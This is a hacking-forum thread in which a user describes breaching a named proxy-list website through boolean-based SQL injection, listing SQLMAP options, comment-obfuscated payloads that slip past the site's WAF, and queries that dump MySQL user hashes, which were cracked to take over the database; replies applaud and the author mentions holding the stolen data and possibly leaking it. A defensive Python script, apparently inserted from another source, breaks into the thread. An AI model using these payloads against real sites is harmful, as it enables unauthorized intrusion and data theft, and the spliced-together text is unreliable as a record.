[WRITEUP] $1k SQLi CHALLENGE
Since a lot of people are asking for a writeup, I'm gonna make it.
I don't usually make a lot of writeups, so don't have high expectations, but I will try to do my best.

(ALL DONE WITH BOOLEAN BASED SQLi)

1. There is a confirmed SQLi in https://coolproxies.com/pl/freeproxylist.php?cc=FR, and the error was showing up, so this shouldn't be so difficult.

2. I started trying manually at https://192.99.224.79/pl/freeproxylist.php?cc=FR, because the Cloudflare WAF wasn't blocking my requests there since it is their backend server, BUT they also have an internal WAF (pretty good btw).

3. Adding ' and '1 to the URL bypassed the SQLi and I was not getting any error, so that is an injection point if used well for Boolean-Based SQLi.

4. Using basic SQLMAP with
--suffix "and '1"
SQLMAP detected the SQLi, but when confirming the DBMS was MySQL I was getting blocked by their WAF, since ALL functions were getting blocked. To bypass it I created a tamper and changed
user() LIKE SYSTEM_USER()

to
USER/*a*/() LIKE USER/*a*/()

so the query can go through it and detect MySQL.

5. I opened with --sql-shell and tried some commands like "select database()", but that was also blocked; bypassed with:
select database/*a*/()


6. Then trying to dump users, hosts and passwords with
SELECT db FROM mysql.db LIMIT 1 OFFSET X

the word mysql was being blocked, I bypassed it using
/*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/db

so the query was:
SELECT db FROM /*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/db LIMIT 1 OFFSET


7. With that I got all the databases in like 15 min, but I wanted the whole data of the whole databases, so what could I do? Get users, hosts and passwords from mysql.user.

8. This one was harder because the words mysql, user, password, host and (again from mysql.) user were blocked. I tried some things and got the bypass using the query:
SELECT /*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/{host,password or user} FROM /*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/user LIMIT 1 OFFSET X

9. With that I dumped all users, passwords and hosts, and I cracked the MySQL hashes (not really, they were on hashes.com lol) and just connected to the db.

This is how a simple Boolean-Based SQLi could lead to something more dangerous like the takeover of a database.
I will try to reply to questions in the comments if I can lol

I'd appreciate it if you rep ;D

- TartarX
Telegram: TarTarx if you need pentesting services
Reply
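The steps above turn on one observation: the internal WAF matched keywords in the raw parameter value, while MySQL parses the value after discarding /* ... */ comments and executing the body of /*! ... */ conditional comments, so the two disagreed on what the query contained. The script below is an added example (not code from the writeup or from the site) showing, from the defender's side, why that keyword filter fails and what actually closes the hole: a normalizer that strips comments the way the server does before any rule is applied, and a parameterized lookup for the cc= value so the input is never parsed as SQL at all. The NAIVE_RULES blocklist is an assumed, illustrative stand-in for the site's real rules, and the proxy table is constructed sample data in sqlite3 so it runs offline.

```python
import re
import sqlite3

# MySQL executes the body of a "conditional comment" (/*!mysql*/ becomes mysql), so the
# normalizer keeps that body; ordinary /* ... */ block comments and line comments are dropped.
COND_COMMENT = re.compile(r"/\*!\d{0,6}\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
LINE_COMMENT = re.compile(r"(?:--\s|#)[^\n]*")


def normalize_sql(fragment: str) -> str:
    """Return the token stream MySQL would actually see: comments resolved, lowercased, single-spaced."""
    s = COND_COMMENT.sub(r"\1", fragment)
    s = PLAIN_COMMENT.sub("", s)
    s = LINE_COMMENT.sub("", s)
    return re.sub(r"\s+", " ", s).strip().lower()


# Assumed, illustrative keyword rules in the style the writeup describes (not the site's real
# ruleset): calls to MySQL built-in functions, and references to the mysql.* system tables.
NAIVE_RULES = [
    re.compile(r"\b(user|system_user|database|version)\s*\(", re.I),
    re.compile(r"\bmysql\.(user|db|host)\b", re.I),
]


def blocklist_hits(fragment: str) -> list:
    """Rule patterns that match the fragment exactly as it arrived (what the naive filter sees)."""
    return [rule.pattern for rule in NAIVE_RULES if rule.search(fragment)]


def blocklist_hits_normalized(fragment: str) -> list:
    """The same rules applied after comment stripping (what the database will execute)."""
    return blocklist_hits(normalize_sql(fragment))


# Constructed stand-in for the proxy table behind ?cc=...; sqlite3 is used only so this runs offline.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE proxies (ip TEXT, cc TEXT)")
    con.executemany(
        "INSERT INTO proxies VALUES (?, ?)",
        [("10.0.0.1", "FR"), ("10.0.0.2", "FR"), ("10.0.0.3", "DE")],
    )
    return con


def lookup_proxies(con: sqlite3.Connection, cc: str) -> list:
    """The real fix: cc travels as a bound parameter, never as SQL text, so a value such as
    FR' and '1 is just a country code nobody has and returns no rows instead of being parsed."""
    rows = con.execute("SELECT ip FROM proxies WHERE cc = ? ORDER BY ip", (cc,)).fetchall()
    return [ip for (ip,) in rows]


if __name__ == "__main__":
    # Sample fragments built from the patterns in the writeup, plus one benign value.
    samples = [
        "FR",
        "USER/*a*/() LIKE USER/*a*/()",
        "select database/*a*/()",
        "SELECT db FROM /*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/db LIMIT 1 OFFSET 3",
    ]
    for frag in samples:
        print(f"{frag!r}\n  normalized : {normalize_sql(frag)!r}"
              f"\n  raw hits   : {blocklist_hits(frag)}"
              f"\n  norm hits  : {blocklist_hits_normalized(frag)}")
    con = build_db()
    print("FR ->", lookup_proxies(con, "FR"))
    print("FR' and '1 ->", lookup_proxies(con, "FR' and '1"))
```

Run it and the raw-string rules miss every commented variant while the normalized rules catch each one; the parameterized lookup makes the question moot, which is why the normalizer belongs in a detection layer and the bound parameter belongs in the application.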
Nice, really did a sex on those little twinks. I found the code mixed with explanatory text a bit annoying, so try putting that on different lines.
Perhaps you could do [code] tags to make it shine thru.
Great exp sexy ;|
~Badoosee Enthusiast~
Reply
Congrats, very interesting to read
Reply
(June 7, 2022, 07:24 PM)Th3FatKat Wrote: Nice, really did a sex on those little twinks. I found the code mixed with explanatory text a bit annoying, so try putting that on different lines.
Perhaps you could do [code] tags to make it shine thru.
Great exp sexy ;|


I will for sure bro, thanks ;D
Reply
Great read bro
Faces In Disguise

Reply
Good writeup
Reply
Congrats, I was close but stuck on the tamper to dump it

Where is the Data?
My kung fu is stronger than yours...


Reply
congratulations and useful writeup
Reply
Oh, didn't notice this till now, that's damn awesome man, good job.

I think leaking the DB would finalize this puzzle of art!

Edit: Seems like someone had some fun with the site
Reply
(June 7, 2022, 07:56 PM)34585 Wrote: Congrats, I was close but stuck on the tamper to dump it

Where is the Data?


In my private server :D


(June 7, 2022, 08:11 PM)420 Wrote: Oh, didn't notice this till now, that's damn awesome man, good job.

I think leaking the DB would finalize this puzzle of art!

Edit: Seems like someone had some fun with the site


Thanks 420 for starting the challenge :D

Maybe I leak the db in the future, but not all, there is some data I want to keep.
Reply